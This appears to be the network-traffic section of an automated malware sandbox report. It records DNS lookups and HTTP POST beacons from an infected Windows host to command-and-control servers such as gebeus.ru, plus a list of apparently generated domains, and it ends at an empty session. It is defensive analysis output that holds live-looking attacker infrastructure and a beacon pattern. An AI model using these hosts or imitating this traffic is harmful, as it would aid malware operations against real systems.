Jul 15, 2024 06:14:06.002024889 CEST	49801	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.007339954 CEST	80	49801	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:06.007426977 CEST	49801	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.007524014 CEST	49801	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.012267113 CEST	80	49801	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:06.567527056 CEST	49802	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:06.572796106 CEST	80	49802	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:06.572856903 CEST	49802	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:06.573015928 CEST	49802	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:06.573030949 CEST	49802	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:06.578133106 CEST	80	49802	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:06.578726053 CEST	80	49802	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:06.788981915 CEST	80	49801	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:06.789582014 CEST	49801	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.794732094 CEST	80	49801	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:06.794791937 CEST	49801	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.908243895 CEST	49803	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.913783073 CEST	80	49803	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:06.913866997 CEST	49803	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.914453030 CEST	49803	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:06.919341087 CEST	80	49803	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:07.621824026 CEST	80	49803	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:07.621954918 CEST	49803	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:07.627330065 CEST	80	49803	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:07.627389908 CEST	49803	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:07.635571957 CEST	80	49802	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:07.635652065 CEST	80	49802	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:07.635700941 CEST	49802	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:07.635755062 CEST	49802	80	192.168.2.5	186.101.193.110
Jul 15, 2024 06:14:07.640500069 CEST	80	49802	186.101.193.110	192.168.2.5
Jul 15, 2024 06:14:07.802759886 CEST	49804	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:07.807832003 CEST	80	49804	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:07.807907104 CEST	49804	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:08.149764061 CEST	49804	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:08.154598951 CEST	80	49804	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:08.525175095 CEST	80	49804	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:08.527050018 CEST	49804	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:08.532200098 CEST	80	49804	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:08.534970999 CEST	49804	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:08.660918951 CEST	49805	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:08.665833950 CEST	80	49805	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:08.665935993 CEST	49805	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:08.665982008 CEST	49805	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:08.670732021 CEST	80	49805	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:09.352406025 CEST	80	49805	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:09.352663994 CEST	49805	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:09.357922077 CEST	80	49805	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:09.357990026 CEST	49805	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:09.470145941 CEST	49806	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:09.474976063 CEST	80	49806	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:09.475162029 CEST	49806	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:09.475162029 CEST	49806	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:09.479944944 CEST	80	49806	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:10.161021948 CEST	80	49806	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:10.161210060 CEST	49806	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:10.166275978 CEST	80	49806	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:10.166363001 CEST	49806	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:10.269848108 CEST	49807	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:10.274840117 CEST	80	49807	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:10.274904966 CEST	49807	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:10.275562048 CEST	49807	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:10.280317068 CEST	80	49807	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:10.966250896 CEST	80	49807	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:10.966381073 CEST	49807	80	192.168.2.5	46.246.96.149
Jul 15, 2024 06:14:10.971628904 CEST	80	49807	46.246.96.149	192.168.2.5
Jul 15, 2024 06:14:10.971684933 CEST	49807	80	192.168.2.5	46.246.96.149

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2024 06:10:28.758306026 CEST	53516	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:10:29.770390987 CEST	53516	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:10:29.866760015 CEST	53	53516	1.1.1.1	192.168.2.5
Jul 15, 2024 06:10:29.866871119 CEST	53	53516	1.1.1.1	192.168.2.5
Jul 15, 2024 06:10:31.893166065 CEST	53360	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:10:32.904093981 CEST	53360	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:10:33.919715881 CEST	53360	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:10:34.247685909 CEST	53	53360	1.1.1.1	192.168.2.5
Jul 15, 2024 06:10:34.247716904 CEST	53	53360	1.1.1.1	192.168.2.5
Jul 15, 2024 06:10:34.247730017 CEST	53	53360	1.1.1.1	192.168.2.5
Jul 15, 2024 06:11:13.240618944 CEST	57570	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:11:13.277544022 CEST	53	57570	1.1.1.1	192.168.2.5
Jul 15, 2024 06:11:24.385991096 CEST	56391	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:11:24.394428968 CEST	53	56391	1.1.1.1	192.168.2.5
Jul 15, 2024 06:13:04.198004961 CEST	64079	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:13:05.200898886 CEST	64079	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:13:06.200861931 CEST	64079	53	192.168.2.5	1.1.1.1
Jul 15, 2024 06:13:06.578305960 CEST	53	64079	1.1.1.1	192.168.2.5
Jul 15, 2024 06:13:06.578407049 CEST	53	64079	1.1.1.1	192.168.2.5
Jul 15, 2024 06:13:06.578444004 CEST	53	64079	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 15, 2024 06:10:28.758306026 CEST	192.168.2.5	1.1.1.1	0xa063	Standard query (0)	evilos.cc	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:29.770390987 CEST	192.168.2.5	1.1.1.1	0xa063	Standard query (0)	evilos.cc	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:31.893166065 CEST	192.168.2.5	1.1.1.1	0x9bfd	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:32.904093981 CEST	192.168.2.5	1.1.1.1	0x9bfd	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:33.919715881 CEST	192.168.2.5	1.1.1.1	0x9bfd	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:11:13.240618944 CEST	192.168.2.5	1.1.1.1	0xf60c	Standard query (0)	mussangroup.com	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:11:24.385991096 CEST	192.168.2.5	1.1.1.1	0xa15c	Standard query (0)	FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZ	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:04.198004961 CEST	192.168.2.5	1.1.1.1	0x2467	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:05.200898886 CEST	192.168.2.5	1.1.1.1	0x2467	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.200861931 CEST	192.168.2.5	1.1.1.1	0x2467	Standard query (0)	gebeus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 15, 2024 06:10:29.866760015 CEST	1.1.1.1	192.168.2.5	0xa063	No error (0)	evilos.cc		127.0.0.127	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:29.866871119 CEST	1.1.1.1	192.168.2.5	0xa063	No error (0)	evilos.cc		127.0.0.127	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		190.159.30.35	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		181.128.64.200	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247685909 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		190.159.30.35	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		181.128.64.200	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247716904 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		190.159.30.35	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		181.128.64.200	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:10:34.247730017 CEST	1.1.1.1	192.168.2.5	0x9bfd	No error (0)	gebeus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:11:13.277544022 CEST	1.1.1.1	192.168.2.5	0xf60c	No error (0)	mussangroup.com		185.149.100.242	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:11:24.394428968 CEST	1.1.1.1	192.168.2.5	0xa15c	Name error (3)	FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZ	none	none	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		190.159.30.35	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578305960 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		181.128.64.200	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		190.159.30.35	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578407049 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		181.128.64.200	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		186.101.193.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		211.168.53.110	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		148.230.249.9	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		130.204.29.121	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		190.159.30.35	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Jul 15, 2024 06:13:06.578444004 CEST	1.1.1.1	192.168.2.5	0x2467	No error (0)	gebeus.ru		181.128.64.200	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mussangroup.com

qydxnaxywntsme.net

gebeus.ru

doqnumhybayljg.net

pqbpwctaxuyno.net

ktdmwvwgrxicbyf.net

xjvjtoqsxecwt.com

ikgaobomjngh.net

dshprjrooia.net

gejkxdmasvmxo.com

jqchsaraxkauihtq.org

77.221.157.163

gxmmgqbcaaod.net

xlokwbpjnmjelwgt.net

ndqtpbgfxigpiob.net

jklgsoopefuhj.net

cjmjmjmgugawaqj.org

hurkgkiufjdhatw.org

twuefpujaurvfca.com

ewsnnfxrccp.org

aeqbmojsaplkjy.com

qhngbjsxhdjts.net

vahxvallvgf.net

46.246.96.149

evdyuckmovmlgw.com

yxdvfnljluug.org

hocvueqllial.net

kojxnjsmgyh.net

woemrmcgjefexq.net

wkabmnjjuon.org

ifgnsbejriuwteg.com

dxpeojjvxfrbjrw.net

rklgpmbjqrvbpp.com

ddxjeoahbwmlur.com

gdirqpperuo.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:34.254204988 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qydxnaxywntsme.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: gebeus.ru
Jul 15, 2024 06:10:34.254219055 CEST	126	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 40 fa 87 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vus@d.zyS2pP@-sYFM
Jul 15, 2024 06:10:36.298791885 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 85 ef Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49714	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:36.309231997 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://doqnumhybayljg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 156 Host: gebeus.ru
Jul 15, 2024 06:10:36.309273005 CEST	156	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 4e 32 f8 91 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vuN2YSnnNw47e_9}^L+R)77Wi55ySc
Jul 15, 2024 06:10:37.801022053 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:10:37.809750080 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pqbpwctaxuyno.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: gebeus.ru
Jul 15, 2024 06:10:37.809750080 CEST	116	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 20 3e ce fc Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA -[k,vu >TTe{u>T4ovSy
Jul 15, 2024 06:10:39.938093901 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:10:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	58.151.148.90	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
